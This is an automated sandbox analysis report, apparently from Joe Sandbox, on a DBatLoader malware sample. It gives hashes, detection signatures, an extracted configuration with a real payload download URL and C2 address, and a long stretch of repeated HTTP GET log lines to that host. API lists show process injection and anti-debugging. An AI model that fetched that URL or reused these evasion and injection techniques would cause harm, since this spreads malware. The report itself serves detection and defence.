Windows Analysis Report
UAHIzSm2x2.exe

Overview

General Information

Sample name:UAHIzSm2x2.exe
renamed because original name is a hash value
Original sample name:483ab6bd562b28782d0999abec4f57f5.exe
Analysis ID:1590517
MD5:483ab6bd562b28782d0999abec4f57f5
SHA1:b758556af2b98708b97a6c3bdbd1e9f2905ed690
SHA256:e5393c34240b7e1b8a35052d7e151c324a4aa6424b5a6e1a45717157042fb9ab
Tags: exe, user-abuse_ch

Detection

DBatLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UAHIzSm2x2.exe (PID: 6228 cmdline: "C:\Users\user\Desktop\UAHIzSm2x2.exe" MD5: 483AB6BD562B28782D0999ABEC4F57F5)
  • cleanup
{"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
Source | Rule | Description | Author | Strings
00000000.00000002.3461173693.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
00000000.00000002.3446485255.00000000022F6000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

Source | Rule | Description | Author | Strings
0.2.UAHIzSm2x2.exe.22f65a8.1.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.2.UAHIzSm2x2.exe.2890000.2.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.2.UAHIzSm2x2.exe.22f65a8.1.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T08:24:10.558255+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49718 | 166.62.27.188 | 443 | TCP

AV Detection

Source: https://amazonenviro.com:443/245_Aiymwhpjxsg | Avira URL Cloud: Label: malware
Source: http://amazonenviro.com/245_Aiymwhpjxsg | Avira URL Cloud: Label: malware
Source: https://amazonenviro.com/245_Aiymwhpjxsg | Avira URL Cloud: Label: malware
Source: http://amazonenviro.com:80/245_Aiymwhpjxsg | Avira URL Cloud: Label: malware
Source: UAHIzSm2x2.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
Source: UAHIzSm2x2.exe | Virustotal: Detection: 77%
Source: UAHIzSm2x2.exe | ReversingLabs: Detection: 87%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: UAHIzSm2x2.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028958B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028958B4

Networking

Source: Malware configuration extractor | URLs: http://amazonenviro.com/245_Aiymwhpjxsg
Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028AE72C InternetCheckConnectionA,0_2_028AE72C
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49736 -> 166.62.27.188:443
Source: global traffic | HTTP traffic detected:
GET /245_Aiymwhpjxsg HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: unknown. UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global traffic DNS traffic detected: DNS query: amazonenviro.com
            Source: unknown HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49718 version: TLS 1.2
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028ADFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_028ADFE4
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028A7CF8 NtWriteVirtualMemory,0_2_028A7CF8
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028A8BA8 GetThreadContext,SetThreadContext,NtResumeThread,0_2_028A8BA8
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028A8BA6 GetThreadContext,SetThreadContext,NtResumeThread,0_2_028A8BA6
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028ADE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028ADE24
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028ADE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028ADE78
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028ADF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028ADF00
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028AF0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_028AF0A8
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028920C4 0_2_028920C4
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028BE596 0_2_028BE596
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: String function: 028A8798 appears 54 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: String function: 028944D0 appears 33 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: String function: 028A881C appears 45 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: String function: 028944AC appears 74 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: String function: 0289480C appears 931 times
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: String function: 028946A4 appears 244 times
            Source: UAHIzSm2x2.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engine Classification label: mal84.troj.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_02897F52 GetDiskFreeSpaceA,0_2_02897F52
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Code function: 0_2_028A6D48 CoCreateInstance,0_2_028A6D48
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
            Source: UAHIzSm2x2.exe Virustotal: Detection: 77%
            Source: UAHIzSm2x2.exe ReversingLabs: Detection: 87%
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe File read: C:\Users\user\Desktop\UAHIzSm2x2.exe Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: apphelp.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: version.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: uxtheme.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: url.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: ieframe.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: iertutil.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: netapi32.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: userenv.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: winhttp.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: wkscli.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: netutils.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: amsi.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: smartscreenps.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: kernel.appcore.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: winmm.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: wininet.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: sspicli.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: windows.storage.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: wldp.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: profapi.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: mswsock.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: ieproxy.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: iphlpapi.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: winnsi.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: msasn1.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: mssip32.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: dnsapi.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: rasadhlp.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: fwpuclnt.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: winhttpcom.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: webio.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: schannel.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: mskeyprotect.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: ntasn1.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: ncrypt.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: ncryptsslp.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: cryptsp.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: rsaenh.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: cryptbase.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: gpapi.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: mlang.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Section loaded: dpapi.dll Jump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
            Source: UAHIzSm2x2.exe Static file information: File size 1161216 > 1048576

            Data Obfuscation

            Source: Yara match | File source: 0.2.UAHIzSm2x2.exe.22f65a8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.UAHIzSm2x2.exe.2890000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.UAHIzSm2x2.exe.22f65a8.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.3461173693.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.3446485255.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A8798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_028A8798
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028932FC push eax; ret 0_2_02893338
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028BD2FC push 028BD367h; ret 0_2_028BD35F
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_0289635A push 028963B7h; ret 0_2_028963AF
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_0289635C push 028963B7h; ret 0_2_028963AF
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028BD0AC push 028BD125h; ret 0_2_028BD11D
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028BD1F8 push 028BD288h; ret 0_2_028BD280
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028BD144 push 028BD1ECh; ret 0_2_028BD1E4
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A86B8 push 028A86FAh; ret 0_2_028A86F2
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_02896738 push 0289677Ah; ret 0_2_02896772
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_02896736 push 0289677Ah; ret 0_2_02896772
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_0289C4EC push ecx; mov dword ptr [esp], edx 0_2_0289C4F1
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_0289D520 push 0289D54Ch; ret 0_2_0289D544
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_0289CB6C push 0289CCF2h; ret 0_2_0289CCEA
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A788C push 028A7909h; ret 0_2_028A7901
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A68C8 push 028A6973h; ret 0_2_028A696B
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A68C6 push 028A6973h; ret 0_2_028A696B
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028AE9E8 push ecx; mov dword ptr [esp], edx 0_2_028AE9ED
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A890E push 028A8948h; ret 0_2_028A8940
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028AA918 push 028AA950h; ret 0_2_028AA948
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A8910 push 028A8948h; ret 0_2_028A8940
